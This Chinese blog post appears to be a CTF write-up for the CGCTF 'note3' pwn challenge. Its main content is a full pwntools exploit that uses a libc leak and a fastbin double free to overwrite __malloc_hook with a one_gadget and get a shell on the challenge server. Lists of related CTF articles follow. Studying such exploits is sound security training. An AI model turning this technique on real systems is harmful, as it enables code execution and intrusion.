pwn cgctf note3

最新推荐文章于 2021-11-06 15:15:13 发布
最新推荐文章于 2021-11-06 15:15:13 发布
阅读量440 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 题目 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37433000/article/details/102912243
本文介绍了一种利用realloc_hook提升内存占用以触发one_gadget的技术,通过具体实例展示了如何在本地环境中进行fastbin攻击,包括设置环境、构造payload和触发漏洞的详细步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

师傅们我被打脸了服务器没挂就是有点不利索
这道题本地也是能通的用realloc_hook提一下占空间就能够触发one_gadget了我重新写了一个见谅~~
正常的fastbin attack

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./note3')
	elf=ELF('./note3')
	libc=elf.libc
else:
	p=remote('45.76.173.177',6666)
	elf=ELF('./note3')
	libc=ELF('./libc-2.24.so')

lg=lambda adress,data:log.success('%s: '+hex(data))

def add(size,content):
	p.sendlineafter('>>','1')
	p.sendlineafter('Size:',str(size))
	p.sendlineafter('Content:',content)

def show(idx):
	p.sendlineafter('>>','2')
	p.sendlineafter('Index:',str(idx))

def edit(idx,content):
	p.sendlineafter('>>','3')
	p.sendlineafter('Index:',str(idx))
	p.sendline(content)

def delete(idx):
	p.sendlineafter('>>','4')
	p.sendlineafter('Index:',str(idx))

def exp():
	show(0)
	add(0x90,'aaaa') #0
	add(0x68,'bbbb') #1
	add(0x68,'cccc') #2
	add(0x18,'bbbb') #3
	delete(0)
	show(0)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-libc.sym['__malloc_hook']-0x10
	lg('libcbase',libcbase)
	o_g=[0x3f306,0x3f35a,0xd694f]
	one_gadget=libcbase+o_g[2]
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	realloc=libcbase+libc.sym['__libc_realloc']
	add(0x90,'cccc') #0
	delete(1)
	delete(2)
	delete(1)
	add(0x68,p64(malloc_hook-0x23))
	add(0x68,'dddd')
	add(0x68,'ffff')
	add(0x68,'a'*19+p64(one_gadget))
	p.recvuntil('>>')
	p.sendline('1')
	p.sendlineafter('Size','2')
	p.interactive()

if __name__=="__main__":
	exp()

flag就在那一个目录下面我开始还以为那个目录就是flag哭了~~

CGCTF pwn When_did_you_born
qq_39596232的博客
08-23 929
题目描述: 只要知道你的年龄就能获得flag,但菜鸡发现无论如何输入都不正确,怎么办? 解题内容: 1、首先附件拿到手,我们先file一下,查看文件类型: tucker@ubuntu:~/pwn$ file when_did_you_born when_did_you_born: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), d...
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 4201
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
CTFNote:CTFNote是一种协作工具,旨在帮助CTF团队组织工作
04-12
周大福 欢迎 CTFNote是一种协作工具,旨在帮助CTF团队组织工作。 安装 使用提供的docker配置来部署项目: $ docker-compose up -d 然后,访问127.0.0.1并创建您的第一个帐户,该帐户将自动具有管理员权限 您可以根据需要选择编辑API配置文件: 礼遇 ADMIN_ALL:可以创建CTF,任务,编辑用户/配置。 EDIT_CTF:可以创建和修改CTF信息; 您应该将此权利授予您的队长 CTF_ALL:可以加入每个CTF; 您应该将此权利授予您的团队成员。 无权限:只能在受邀时查看CTF; 这用于不定期的客人。 允许CTF来宾创建和编辑任务,但不允许创建和编辑任务。 发展 开发服务器包括一个简单的HTTP代理,允许前端访问本地API(cf )。 同时在两个组件上都配置了热重装。 设置并启动前端 $ cd front/ $ yarn instal
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2193
最近肥肠地想入门一下pwn,找了道题试了一下。 题目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看题。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
CG-CTF pwn部分wp
awxnutpgs545144602的博客
08-16 443
面向pwncgctfPWN1,When did you born题目给了一个ELF文件,和一个.C文件先运行ELF,大概如下What’s Your Birth?0What’s Your Name?0You Are Born In 0You Are Naive.You Speed One Second Here.打开.C文件,发现是ELF的源码 #include ...
BUUCTF zctf_2016_note3
doudoudedi
01-13 517
一道典型的unlink题目整形溢出因为i是无符号长整型如果输入-1就会变得巨大实现堆溢出这里应该可以用unlink泄露libc基址然后用fastbin attack打malloc_hook但是这里有多次写入的edit功能就很好做了 先申请4个chunk 然后unlink一个指针到bss段上 unlink的操作fake chunk的fd和bk必须指回自己也就是一个确定的值具体为 `` fake ch...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF总结-PWN
qq_42747131的博客
05-14 7352
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CGCTF pwn CGfsb writeup
qq_39596232的博客
08-23 674
一、实验目的: 破解我的第一个pwn,获取flag(虽然也参考了别人*^*O*^*) 二、实验环境: Ubuntu 18.04 / gdb-peda / pwntools Windows7 IDA pro 三、实验内容: 1、题目到手,我们拿到了一个网址和ELF文件,首先我们对ELF文件进行分析: tucker@ubuntu:~/pwn_files$ checksec...
zctf_2016_note3
seaaseesa的博客
04-17 837
zctf_2016_note3 首先检查一下程序的保护机制 然后用IDA分析一下,edit里存在一个整数溢出导致堆溢出的漏洞。当输入为0x8000000000000000时,即可使得index为-1,由于输入的长度不够,因此将0x8000000000000000转为负数的形式输入进去即可。然后就是正常的unlink了。 #coding:utf8 from pwn import * ...
2016 ZCTF——note3
04-20 327
64位程序,没开PIE  #unlink #整数溢出 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stder...
CGCTF——层层递进
知足且坚定,温柔且上进
02-07 638
点开题目链接直接跳转一个另一个网页 F12查看源代码:(如果不方面看可以 Ctrl+u 看) 在源代码中看见src="so.html; src什么意思? HTML中src是source的缩写,这里是源文件的意思。“source”本身是“源”的意思。 点击 so.html 又来?根据题目层层递进的含义,不断点src。 从so.html 跳转到 so.htm 最后跳转到 404.html: 发...
zctf_2016_note3 详解
One_p_Two_w的博客
11-04 727
zctf_2016_note3 详解 题目可以在buu上找到,ibc版本为2.23 和wiki做的不一样,wiki那个我还没看懂,改天再研究研究orz 查看保护机制 题目分析 是个菜单题,提供了新建note、打印note、编辑note、删除note四个功能 添加note ​ 最多添加七个note,每个note大小在0-0x400之间,申请到的堆空间地址会放在ptr指针处 漏洞在edit功能模块 ​ 当a2 = 0时,由于i为unsigned_int,-1相当于无穷大,会造成无限制读入,令我们可以覆盖后面
CG CTF PWN When did you born?
无限迭代中......
07-24 637
题目: nc ctf.acdxvfsvd.net 1926 Try not to be naive TIPS: gets,栈溢出 https://pan.baidu.com/s/1nuZXEL7 提取密码:dwvg 题解: 工具: checksec IDA Pro 下载 解压 test.c #include <stdio.h> struct ...
zctf_2016_note3(整数溢出,unlink)
m0_51251108的博客
11-06 251
zctf_2016_note3: 好像没show? 逆向分析: 主界面: add函数: show函数: show假的 edit函数: 我们跟进这个函数, size-1跟一个无符号int作比较,如果size为0的话,就能造成任意大小堆溢出 delete函数: 指针释放干净了 思路: 我们申请size为0的chunk堆溢出,伪造chunk,触发unlink,改写free的got表为atoi 在填入/bin/sh exp: from pwn import * #from LibcSearcher i
cgctf RE (Hello,RE!\ReadAsm2\Py交易\maze\你大概需要一个优秀的mac)
qq_42192672的博客
09-12 1245
1. Hello,RE! 直接拖进IDA,根据提示找奇怪的字符串并转换 直接切近main函数,然后转成伪C代码,发现了输出flag的结构,直接吧看到的数字进行转换就好 2. ReadAsm2 硬考汇编阅读能力,读呗……给出的是func函数,结合main函数一起理解 大概分析一下吧,刚开始就是个保存现场,然后跳转到400522,开始判断是否超出范围,没超出的话跳转到4004fa开始...
pwn 口算 ctf
最新发布
10-15
pwn 口算 ctf 是一种 CTF 竞赛中的题目类型,主要考察选手对于二进制漏洞利用和计算机底层知识的掌握程度。这类题目通常会提供一个二进制文件,选手需要通过分析程序的漏洞,编写相应的 exploit 脚本,从而获取程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值